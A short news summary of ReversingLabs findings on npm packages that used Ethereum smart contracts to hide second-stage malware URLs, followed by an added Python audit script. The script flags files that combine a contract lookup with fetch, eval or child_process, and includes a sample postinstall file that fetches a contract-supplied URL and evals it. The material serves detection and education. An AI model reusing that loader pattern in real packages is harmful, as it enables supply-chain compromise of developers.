Ethereum Smart Contracts Used to Conceal Malware in Supply Chain Attacks

Recent research from ReversingLabs revealed two malicious npm packages, “colortoolsv2” and “mimelib2,” that use Ethereum smart contracts to hide harmful code. Key points include:

  • The packages were uploaded to the npm registry (Node Package Manager) in July.
  • They queried the smart contracts to fetch hidden URLs, from which systems then downloaded second-stage malware.
  • Attackers disguised their activities as legitimate blockchain traffic, complicating detection.
  • This method expands on previous tactics using trusted services for hosting malicious links.
  • The malicious packages were linked to fake GitHub repositories portraying cryptocurrency trading bots.
  • Developers risked importing malware unknowingly.
  • The incident highlights ongoing supply chain risks in open-source crypto tools, building on over 20 flagged campaigns last year aimed at stealing wallet credentials or installing crypto miners.

Developers should be cautious of fake commits and maintainers, as even innocuous-looking packages may conceal threats.
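The pattern described above (an on-chain lookup that yields a URL, followed by a download and execution of whatever it points to) can be turned into a pre-install audit heuristic. The following is an added example written for this summary; it is not ReversingLabs' tooling or analysis code, the detection patterns are a hypothetical heuristic of my own, and the sample package contents are constructed. It flags files that combine an Ethereum contract/RPC indicator with a remote fetch or dynamic execution indicator, and then checks whether an npm lifecycle hook (preinstall/install/postinstall) would run such a file automatically on `npm install`.

```python
"""Hypothetical npm package audit heuristic (added example, not ReversingLabs' tooling).

Either indicator family below is common in legitimate code; the signal is a single
file that both talks to an Ethereum contract and fetches or executes code at run time.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass, field

# Indicators of an on-chain lookup (library imports, contract objects, raw JSON-RPC method).
CHAIN_PATTERNS = {
    "ethers/web3 import": re.compile(r"""(require\(\s*['"]|from\s+['"])(ethers|web3)['"]"""),
    "ethers.Contract": re.compile(r"new\s+ethers\.Contract\s*\("),
    "eth_call rpc": re.compile(r"\beth_call\b"),
}
# Indicators of downloading or executing something decided at run time.
EXEC_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "new Function": re.compile(r"new\s+Function\s*\("),
    "child_process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)"""),
    "remote fetch": re.compile(r"\b(fetch|axios\.get|https?\.get)\s*\("),
}
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


@dataclass
class FileFinding:
    path: str
    chain_hits: list[str] = field(default_factory=list)
    exec_hits: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Only the combination of both indicator families is reported.
        return bool(self.chain_hits and self.exec_hits)


def scan_file(path: str, text: str) -> FileFinding:
    """Match every indicator pattern against one file's source text."""
    finding = FileFinding(path)
    for label, pat in CHAIN_PATTERNS.items():
        if pat.search(text):
            finding.chain_hits.append(label)
    for label, pat in EXEC_PATTERNS.items():
        if pat.search(text):
            finding.exec_hits.append(label)
    return finding


def scan_package(files: dict[str, str]) -> dict:
    """files maps relative path -> contents of an unpacked npm package."""
    findings = [scan_file(p, t) for p, t in files.items()
                if p.endswith((".js", ".cjs", ".mjs"))]
    suspicious = [f.path for f in findings if f.suspicious]
    try:
        scripts = json.loads(files.get("package.json", "{}")).get("scripts", {})
    except json.JSONDecodeError:
        scripts = {}
    hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
    # Lifecycle hooks run automatically on `npm install`; a hook that invokes a
    # suspicious file is the case a developer most needs to see before installing.
    hooked = sorted({p for p in suspicious
                     for cmd in hooks.values() if p.split("/")[-1] in cmd})
    return {"suspicious_files": suspicious, "install_hooks": hooks,
            "hooked_suspicious": hooked, "details": findings}


# Constructed sample package (not the real colortoolsv2/mimelib2 contents):
# a harmless colour helper plus a postinstall script showing the flagged pattern.
SAMPLE_PACKAGE = {
    "package.json": '{"name": "example-color-utils", "version": "1.0.0",'
                    ' "scripts": {"postinstall": "node setup.js"}}',
    "index.js": 'module.exports = { hex: (r, g, b) => "#" + [r, g, b]'
                '.map(x => x.toString(16).padStart(2, "0")).join("") };\n',
    "setup.js": 'const { ethers } = require("ethers");\n'
                'const c = new ethers.Contract("0x0000000000000000000000000000000000000000",'
                ' ["function getUrl() view returns (string)"], provider);\n'
                'c.getUrl().then(u => fetch(u)).then(r => r.text()).then(src => eval(src));\n',
}

if __name__ == "__main__":
    report = scan_package(SAMPLE_PACKAGE)
    for f in report["details"]:
        print(f"{f.path}: chain={f.chain_hits} exec={f.exec_hits} suspicious={f.suspicious}")
    print("install hooks:", report["install_hooks"])
    print("hooked suspicious files:", report["hooked_suspicious"])
```

This is a triage aid, not a verdict: a legitimate trading bot may well import `ethers` and call `fetch` in the same file, so a hit is a reason to read the flagged file and the lifecycle scripts before installing, which is exactly where the fake repositories and maintainers mentioned above are meant to discourage scrutiny.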